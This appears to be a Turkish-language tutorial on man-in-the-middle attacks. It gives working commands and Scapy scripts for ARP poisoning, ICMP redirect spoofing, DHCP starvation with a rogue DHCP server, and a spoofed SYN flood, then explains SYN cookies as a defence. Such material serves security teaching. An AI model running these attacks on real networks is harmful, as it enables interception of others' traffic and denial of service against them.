# MITM (Man In The Middle)

Bir ağ içerisindeki sistem kendi bağlantılarını başkası üzerinden geçiriyor ise
arada kalan sistem akan trafiği inceleyebilir. Bunu yapmaktaki amaç arada akan
trafiği incelemek veya farklı bir müdahalede bulunmak. Örnek olarak iki farklı
yöntem vardır.

* DHCP 
* ARP
* Layer 3 (ICMP)
* TCP

## ARP

**[!] Bunu yapabilmek için Arp Adresleriyle oynamak daha kolay olduğu için DHCP
serverini indirmek yerine [ARP](ARP.html) konusunda yaptığımız gibi mac
adreslerini değiştirmeliyiz.**

```
echo 1 > /proc/sys/net/ipv4/ip_forward # Routing Özelliğini Açar
arpspoof -c both -t 1.1.1.1 -r 2.2.2.2 # Router ve Hedef Sistemin Arp Tablosunu Zehirler
```
Veya scapy kullanmak istersek.

```
ethBaslik = Ether(dst="00:0c:29:fe:7b:ea",src="00:0c:29:14:3c:c9")
ARPBaslik = ARP(op=1, hwsrc="00:0c:29:fe:7b:ea",psrc="1.1.1.1",pdst="2.2.2.2")
sendp(ethBaslik/ARPBaslik)
```

## ICMP

ICMP Redirect paketi kullanarak trafiğin akışı değiştirilebilir.

Kurban sisteme icmp redirect paketi kaynak olarak router gösterilerek router
olarak kendi adresimizi gönderirsek eğer giden paketleri yakalayabiliriz.
Buradaki sıkıntı paketin içinde source kısmı kurban sistem olduğu için router
gelen paketi saldırgana göndermez. Gelen paketi yakalayabilmek için TCP paketi
içerisindeki source kısmını kurban ip yerine saldırganın ip adresini yapılmalı
ki router gelen cevabı saldırgana gönderebilsin.

```
#!/bin/python2.7
from scapy.all import *

originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''

# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Release the Kraken!
while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
```

Paket Kurbandan adresinden çıkarken kaynak kısmını değiştirmek için iptables
kullanılabilir.

```
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
```

## DHCP

**DHCP servisini indirip** kendi dhcp servisimizi başlatarak gateway adresini
değiştirerek bunu başarabiliriz.

İlk olarak DHCP sunucusundaki havuzu doldurmak (DHCP-Starve)

```
$ scapy
for i in range(2,255):
    mac = str(RandMAC())
	dhcpServerID="192.168.255.51"
    eth = Ether(dst="ff:ff:ff:ff:ff:ff",src=mac)
    ip  = IP(src="0.0.0.0",dst="255.255.255.255")
    ud  = UDP(sport=68,dport=67)
    bootp = BOOTP(chaddr=mac)
    dhcp = DHCP(options = [ ("message-type","request"),("requested_addr","192.168.255."+str(i)),("server_id",dhcpServerID),"end"])
    sendp(eth/ip/ud/bootp/dhcp)
```

daha sonra bir dhcp sunucusunu ayağa kaldırıp broadcastte dhcp keşfi aryan
makinalara ip adresini vererek trafiği inceleyebiliriz. DHCP server olarak
**dnsmasq** örnek verilebilir.

## TCP

TCP/Dos saldırısı TCP/SYN paketinin kaynak ip ve port bilgilerini değiştirerek
gönderebilir. Servise yönelik yapılacağı zaman daha etkilidir.

Scapy kullanarak şu şekilde yapılabilir:

```
$ scapy
ip = IP(src=RandIP(),dst="0.0.0.0")
tcp = TCP(sport=RandShort(),dport=80,flags="S")
paket = ip/tcp
send(paket,loop=1)
```

mz adlı aracı kullanmak istersek:

```
mz -B >ip< -t tcp "sp=1-65535,dp=80,flags=syn" -c 0
```

---

### SynCookie

Sunucu ilk açıldığında rastgele bir sayı üretilir ve bu **X** sayısı kaynak ip,
kaynak port ve hedef port ile toplanır. Sunucuya gelen SYN+ACK requestinde
gelende seq numarasını bir azaltıp geriye doğru kontrol eder. Bu sayede
sunucudaki tablonun doldurulması engellenebilir.

```
---SYN--->
<--SYN-ACK- # sequenceNumarası = KaynakIP + KaynakPort + HedefPort + X
---ACK--->  # Burda Client acknowledgeNumarasına sequenceNumarası+1 yazmalı
```

Yukarıdaki gibi bir 3 way handshake işleminde, Sunucu tarafında gelen
acknowledge kısmını bir azaltıp adresleri kontrol ederek oturumun başarılı bir
şekilde devam ettiğini daha az masrafla tablo kullanmadan anlayabilir.

**[!] Ubuntu Serverda bu özellik varsayılan olarak aktiftir.**
